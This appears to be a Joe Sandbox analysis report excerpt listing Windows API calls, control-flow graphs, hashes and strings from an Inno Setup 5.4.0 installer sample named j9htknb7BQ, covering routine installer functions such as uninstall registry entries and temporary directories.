424082-42408d 1906->1927 1928 423d29-423d2c 1906->1928 1907->1889 1930 42406b-42407d 1907->1930 1931 424130-424137 1910->1931 1932 423d5b 1910->1932 1921 424106-424119 call 4244e4 1911->1921 1922 42411b-42412e call 42453c 1911->1922 1915->1889 1956 4240de-4240e4 SetFocus 1915->1956 1938 423cc9-423cca 1918->1938 1939 423dde-423dec IsIconic 1918->1939 1940 423ebe-423ed1 call 423b24 1919->1940 1941 423eef-423f00 call 423b94 1919->1941 1921->1889 1922->1889 1923->1889 1943 423cf7 1924->1943 1944 423e1b-423e29 call 424188 1924->1944 1983 423e93-423eb0 call 423a94 PostMessageA 1925->1983 1984 423e71-423e8e call 423b24 PostMessageA 1925->1984 1927->1889 1952 424093-4240a5 1927->1952 1949 423d32 1928->1949 1950 423f66-423f6e 1928->1950 1930->1889 1947 42414a-424159 1931->1947 1948 424139-424148 1931->1948 1951 42415b-42415c call 423b94 1932->1951 1934->1889 1957 423cd0 1938->1957 1958 423da1-423da9 1938->1958 1964 423dfa-423e01 call 423b94 1939->1964 1965 423dee-423df5 call 423bd0 1939->1965 1989 423ee3-423eea call 423b94 1940->1989 1990 423ed3-423edd call 41ef68 1940->1990 1994 423f02-423f08 call 41eeb4 1941->1994 1995 423f16-423f1e call 423a94 1941->1995 1943->1951 1944->1889 1945->1889 1991 423ff5-424004 call 4181f0 IsWindowVisible 1945->1991 1947->1889 1948->1889 1949->1951 1950->1889 1971 423f74-423f7b 1950->1971 1979 424161 1951->1979 1952->1889 1956->1889 1957->1951 1958->1889 1973 423daf-423db4 call 422c5c 1958->1973 1964->1889 1965->1889 1971->1889 1982 423f81-423f90 call 4181f0 IsWindowEnabled 1971->1982 1973->1889 1979->1889 1982->1889 2005 423f96-423fac call 412320 1982->2005 1983->1889 1984->1889 1989->1889 1990->1989 1991->1889 2012 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1991->2012 2009 423f0d-423f10 1994->2009 1995->1889 2005->1889 2015 423fb2-423fbc 2005->2015 2009->1995 2012->1889 2015->1889
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                          • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                          • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                          • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                          APIs
                                                                            • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                            • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                            • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                            • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                            • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                            • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                            • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                            • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                            • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                            • Part of subcall function 00493C7C: 73A0A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                            • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                            • Part of subcall function 00493C7C: 73A0A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                            • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0234D8D0,0234F524,?,?,0234F554,?,?,0234F5A4,?), ref: 00467B3B
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                            • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                          • String ID: $(Default)$STOPIMAGE
                                                                          • API String ID: 3271511185-770201673
                                                                          • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                          • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                          • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                          • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: unins$unins???.*
                                                                          • API String ID: 3541575487-1009660736
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                          Similarity
                                                                          • API ID: ErrorFileFindFirstLast
                                                                          • String ID:
                                                                          • API String ID: 873889042-0
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                          • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                          Similarity
                                                                          • API ID: CreateInstanceVersion
                                                                          • String ID:
                                                                          • API String ID: 1462612201-0
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0

                                                                          APIs
                                                                            • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                          • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                          • API String ID: 3132538880-1122008755

                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                          • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: FindSleepWindow
                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                          • API String ID: 3078808852-3310373309

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                          • API String ID: 2230631259-2623177817
                                                                          • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                          • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                          • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                          • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                            • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                            • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                            • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: DeleteErrorLastValue$CloseCreate
                                                                          • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                          • API String ID: 2638610037-3092547568
                                                                          • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                          • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                          • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                          • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                          Strings
                                                                          • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                          • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                          • %s\%s_is1, xrefs: 00468545
                                                                          • Inno Setup: Selected Components, xrefs: 004685EA
                                                                          • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                          • Inno Setup: Setup Type, xrefs: 004685DA
                                                                          • Inno Setup: User Info: Name, xrefs: 00468687
                                                                          • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                          • Inno Setup: Icon Group, xrefs: 004685A6
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                          • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                          • Inno Setup: App Path, xrefs: 0046858A
                                                                          • Inno Setup: No Icons, xrefs: 004685B3
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1093091907
                                                                          • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                          • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                          • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                          • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(6F940000,SHGetFolderPathA), ref: 0047B9DE
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                          • API String ID: 190572456-2632518235
                                                                          • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                          • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                          • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                          • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                          • API String ID: 1375471231-857235331
                                                                          • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                          • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                          • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                          • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                          • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                          • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                          • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                          • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                          • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                          • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                          • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                          • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                          • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                          • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                          • String ID:
                                                                          • API String ID: 183575631-0
                                                                          • Opcode ID: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
                                                                          • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                          • Opcode Fuzzy Hash: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
                                                                          • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                          Control-flow Graph
                                                                          control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F403
                                                                          • GetFocus.USER32 ref: 0042F40B
                                                                          • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                          • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                          • String ID: TWindowDisabler-Window
                                                                          • API String ID: 3167913817-1824977358
                                                                          • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                          • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                          • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                          • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                          Control-flow Graph
                                                                          control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae 2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc call 42e73c call 403400 2277->2279 2278->2279
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
